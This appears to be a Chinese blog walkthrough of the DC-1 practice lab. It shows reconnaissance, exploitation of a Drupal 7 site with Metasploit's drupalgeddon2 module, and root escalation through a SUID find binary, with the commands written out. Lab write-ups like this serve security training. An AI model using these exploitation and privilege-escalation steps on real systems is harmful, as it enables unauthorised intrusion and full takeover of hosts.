zoukankan
html css js c++ java
DC1
1.收集信息
cms信息 使用的是Drupal的cms
端口信息 开开启了22端口,80端口,111端口
目录信息 扫到敏感目录
http://192.168.0.119/robots.txt
通过cewl收集敏感信息并生成字典
cewl http://192.168.0.119 -w passwd.txt
2.漏洞分析与利用
通过robots.txt查看敏感目录内容获取中重要信息
可以从uprgade.txt看出,使用的cms是版本为7.x的Drupal
搜索相关漏洞
进入msfconsle ——> search Drupal
尝试使用最新的,rank为execllent的payload: exploit/unix/webapp/drupal_drupalgeddon2
使用该payload后查看目标是否在可攻击版本范围内
设置攻击目标,得到session会话
3.尝试提权
内核作为最后杀招不得已再用。首先联想到常见几种提权方式,suid提权
python -c 'import pty;pty.spawn("/bin/bash")' #利用python的pty获得一个完整的tty
find / -perm -u=s -type f 2>/dev/null #将有suid权限的打印出来
发现常用于usid提权的工具find
cd /tmp #切换到tmp目录下
touch luojun #创建lj文件
find luojun -exec "whoami" ; #查询lj文件并执行whoami命令
成功发现执行命令的是root权限
find luojun -exec "/bin/bash" ; #将bash的shell反弹出来,发现失败了
find luojun -exec "/bin/sh" ; #将sh的shell反弹出来,发现成功,获得root权限
提权成功,接下来任意妄为寻找flag
查看全文
相关阅读:
编译 netcat for lineage-17.1-20210303-UNOFFICIAL-dipper.zip (ARM)
Mi8-Android-arm 中网络接口命名:wlan0 & rmnet_data 《========》 VB-Android-x86 中网络接口命名:eth1 & wifi_eth
HOW TO CHANGE LINUX KERNEL DMESG BUFFER SIZE
Calculation of RTO in tcp and related open source implementation (Linux kernel, unbound) --- rtt, rttvar, cwnd, ssthresh
图解Linux网络包接收过程
Tcpprobe 在网络中的使用 --- tcp_probe has been removed from the kernel. --- Using ip-tcp_metrics --- Using ss (socket statistics)
全面的 iPerf3 Android平台移植编译、运行过程记录
socket、sock、sk_buff、net_device 关系图
tcp: Add TCP_FREEZE socket option
ECNU 2031 绝对值排序
原文地址:https://www.cnblogs.com/sup3rman/p/12389296.html
最新文章
mysql启动过程
ORACLE的启动过程
MYSQL5.7.24编译安装
在LINUX下ORACLE11.2.04的安装脚本及静默安装
oracle 设置归档日模式
my live sports / 2020 Europe Cup
hd + tplink TL-ER6229GPE-AC / TL-R479GPE-AC
OS + Linux Kali / Debian BackTrack
OS + Linux SWAP
my read book / sci-hub / libgen
热门文章
springboot 富文本 导出word 、pdf
基于jquery 分页插件,前端分页、后端分页都可以 jquery.pagination.js
windows安装vmWare workstations 16 并且安装 ubuntu操作系统 + docker安装gitlab
java+fiddler4 实现微信公众号文章抓取
aircrack-ng on OSX 从零开始之安装
StartSSL免费SSL证书成功申请-HTTPS让访问网站更安全
CONFIG_NET_SCH_NETEM: to emulate network delay, loss, and packet re-ordering.
Tuning initcwnd for optimum performance
MPTCP协议---Android手机通过 WIFI 和 4G 两条路径同时传输视频数据 --- 抓包分析 --- tcpdump-mptcp-20210304004.txt
the socket buffer size of linux
Copyright © 2011-2022 走看看